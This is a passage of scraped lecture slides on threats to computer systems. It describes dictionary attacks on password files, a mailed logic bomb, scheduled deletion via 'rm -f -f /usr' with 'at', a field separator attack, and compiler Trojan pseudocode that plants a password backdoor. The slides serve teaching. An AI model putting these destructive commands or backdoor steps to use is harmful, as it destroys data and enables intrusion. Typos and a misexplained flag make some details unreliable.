![Page 66: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/66.jpg)
Last approach - attack on the password file and encryption function obtain a copy of the password and encryption
function obtain an electronic dictionary create a routine that encrypt every entry in the
dictionary and compare it with all entries in your copy of the password file
any match will real a valid password
Advantages: the intruder does guess or infer the password directly, the attack can be performed offline
![Page 67: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/67.jpg)
2.7.3 Logic Bomb MailLogic bombs are programs that remain
dormant until some predetermined logical condition on the target system becomes true
Step for setting up logic bomb: set up a command that removes all files (e.g. “rm”)
as an edit parameter to file EDIT_ME mail EDIT_ME to your system administrator
if the administrator do not open the file, it will do no damage otherwise all file will be erased
![Page 68: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/68.jpg)
2.7.4 Scheduled File RemovalSchedule file is used to schedule the smooth
running of programs in a computerOn UNIX, command “at” is usedExample:
rm -f -f /usr
at 0400 Sunday attack
Program will be placed in the write-protected directory and will execute file removable recursively (-f) without diagnostics (-f) every Sunday
![Page 69: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/69.jpg)
2.7.5 Field Separator Attack
This attack relies on several technical assumptions: field separators exist privilege execution program/command exist the actual file name of the administrator want to
execute
![Page 70: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/70.jpg)
Steps to create such attack redefine ‘/’ as ‘ ’ hence pathname “/foo/moo”
becomes “ foo moo” knowing the administrator will use “sysprog” to
open file called “/foo/moo”, create a program call “foo” in an accessible directory. Program “foo” will transfer the administrator to the intruder
when “sysprog” is invoked, the program “foo” is executed and the attack is achieved.
![Page 71: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/71.jpg)
2.7.6 Insertion of Compiler Trojan Horse
Compiler Trojan Horse attack will create a more widespread damage
Normal simplified Compiler operation:compile:
get (line);
translate (line);
The goal of Trojan Horse is to look for certain text patterns in the input programs for compile to translate and code insertion
![Page 72: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/72.jpg)
Example:Compile:
get (line);
if line = ‘read_pwd(p)” then
translate (Trojan horse insertion);
else
translate (line);
fi;
The Trojan Horse program may introduce a password backdoor and allow get into the system using common password like “12345”
![Page 73: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/73.jpg)
2.7.7 Simple Attack Prevention Methods
Individual Screening checking background of individual who allow to
access the system may introduce attack to the system
Physical Control securr the facilities with an enclosed
environment
Care in operation set up security procedures
![Page 74: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/74.jpg)
2.8 References
E Amoroso - Chapters 1- 5